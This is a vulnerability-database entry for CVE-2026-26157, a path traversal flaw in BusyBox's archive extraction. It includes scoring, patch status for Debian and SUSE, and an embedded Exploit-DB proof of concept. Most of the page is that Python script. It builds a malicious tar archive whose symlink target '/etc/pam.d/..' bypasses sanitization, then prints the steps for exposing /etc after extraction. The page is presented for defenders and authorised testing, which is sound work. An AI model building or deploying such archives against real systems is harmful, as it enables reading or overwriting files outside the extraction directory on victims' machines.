CVE-2026-26157

high

Published 2026-02-11 · Modified 2026-06-02

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

7.0

CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS v4 NEW

—

not yet in upstream

VIR risk

8.0

Description

A flaw was found in BusyBox. Incomplete path sanitization in its archive extraction utilities allows an attacker to craft malicious archives that when extracted, and under specific conditions, may write to files outside the intended directory. This can lead to arbitrary file overwrite, potentially enabling code execution through the modification of sensitive system files.

Predictions

Exploit likelihood

100%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-52538 webapps multiple text · 5 KB

Calil Khalil · 2026-04-30

BusyBox 1.37.0 - Path Traversal

text exploit Source: Exploit-DB

# Exploit Title: BusyBox 1.37.0 - Path Traversal 
# Google Dork: N/A
# Date: 2026-02-11
# Exploit Author: Calil Khalil
# Vendor Homepage: https://busybox.net
# Software Link: https://busybox.net/downloads/
# Version: BusyBox 1.36.1, 1.37.0
# Tested on: Ubuntu 22.04 LTS, Alpine Linux 3.19
# CVE: CVE-2026-26157

"""
BusyBox Path Traversal Vulnerability (CVE-2026-26157)

Description:
BusyBox archive extraction utilities fail to properly sanitize symlink targets
containing trailing ".." components. The strip_unsafe_prefix() function in
archival/libarchive/unsafe_prefix.c uses strstr(cp, "/../") which only matches
the 4-character pattern and misses 3-character trailing "/.." sequences.

This allows an attacker to craft malicious archives with symlinks pointing to
arbitrary filesystem locations, enabling information disclosure through symlink
traversal.

Affected Components:
- tar (primary vector)
- unzip
- rpm
- ar

Impact:
- CVSS Score: 7.8 (HIGH)
- Arbitrary file read via symlink traversal
- Information disclosure
- Credential theft

Root Cause:
archival/libarchive/unsafe_prefix.c:23
The pattern matching in strip_unsafe_prefix() fails on trailing ".." paths:
  cp2 = strstr(cp, "/../");  // Only matches "/../", misses "/pam.d/.."
  if (!cp2) break;

Attack Scenario:
1. Attacker creates TAR archive with symlink: sensitive_data -> /etc/pam.d/..
2. Victim extracts archive using BusyBox tar
3. Symlink created without sanitization
4. Symlink resolves to /etc directory
5. Application reading 'sensitive_data' exposes /etc contents

References:
- https://github.com/calilkhalil/research
- Red Hat CNA Case: INC3907198
"""

import tarfile
import sys
import os

def create_exploit():
    """
    Creates a malicious TAR file exploiting CVE-2026-26157.
    
    The archive contains a symlink with an unsanitized target that
    resolves outside the extraction directory.
    """
    
    exploit_file = 'CVE-2026-26157_exploit.tar'
    
    try:
        with tarfile.open(exploit_file, 'w') as tar:
            # Create symlink with trailing ".." in target path
            # This bypasses strip_unsafe_prefix() pattern matching
            info = tarfile.TarInfo('sensitive_data')
            info.type = tarfile.SYMTYPE
            info.linkname = '/etc/pam.d/..'  # Resolves to /etc
            tar.addfile(info)
        
        print(f"[+] Exploit created: {exploit_file}")
        print(f"\n[*] Exploitation steps:")
        print(f"  1. mkdir test_extraction && cd test_extraction")
        print(f"  2. busybox tar xf ../{exploit_file}")
        print(f"  3. readlink -f sensitive_data")
        print(f"     Expected output: /etc")
        print(f"  4. ls sensitive_data/")
        print(f"     Result: Lists /etc directory contents")
        print(f"\n[!] Impact: Arbitrary directory read via symlink traversal")
        print(f"[!] CVSS: 7.8 HIGH (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)")
        
        return exploit_file
        
    except Exception as e:
        print(f"[-] Error creating exploit: {e}")
        sys.exit(1)

def show_technical_details():
    """Display technical analysis of the vulnerability"""
    
    print("\n" + "="*70)
    print("TECHNICAL ANALYSIS - CVE-2026-26157")
    print("="*70)
    print("\nVulnerable Function:")
    print("  archival/libarchive/unsafe_prefix.c:strip_unsafe_prefix()")
    print("\nVulnerable Code Pattern:")
    print("  cp2 = strstr(cp, \"/../\");  // Only matches 4-char sequence")
    print("  if (!cp2) break;")
    print("\nBypass Technique:")
    print("  Path: /etc/pam.d/..")
    print("  Pattern check: strstr(\"/etc/pam.d/..\", \"/../\") -> NULL")
    print("  Result: Sanitization bypassed, symlink created with original target")
    print("\nExploitation Flow:")
    print("  1. Archive contains: symlink 'sensitive_data' -> '/etc/pam.d/..'")
    print("  2. get_header_tar() extracts symlink metadata")
    print("  3. Symlink target NOT sanitized (bypass detected)")
    print("  4. data_extract_all() creates symlink with '/etc/pam.d/..'")
    print("  5. Target resolves: /etc/pam.d/.. -> /etc")
    print("  6. Reading 'sensitive_data' = reading /etc")
    print("="*70 + "\n")

if __name__ == "__main__":
    print("="*70)
    print("BusyBox Path Traversal Exploit - CVE-2026-26157")
    print("Author: Calil Khalil")
    print("="*70)
    
    # Display technical analysis
    show_technical_details()
    
    # Create exploit
    exploit_file = create_exploit()
    
    print("\n[*] Mitigation:")
    print("  - Update BusyBox to patched version")
    print("  - Patch applies strip_unsafe_prefix() to symlink targets")
    print("  - Do not extract untrusted archives with elevated privileges")
    
    print("\n[*] For educational and authorized testing purposes only")

OS impact

SUSE Affected 1 release

Version	Status	Fixed in
—	Affected	—

Debian Mixed 5 releases

Version	Status	Fixed in
trixie	Affected	—
sid	Fixed	`1:1.37.0-10.1`
forky	Fixed	`1:1.37.0-10.1`
bullseye	Affected	—
bookworm	Affected	—

References

CWEs

CWE-73

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.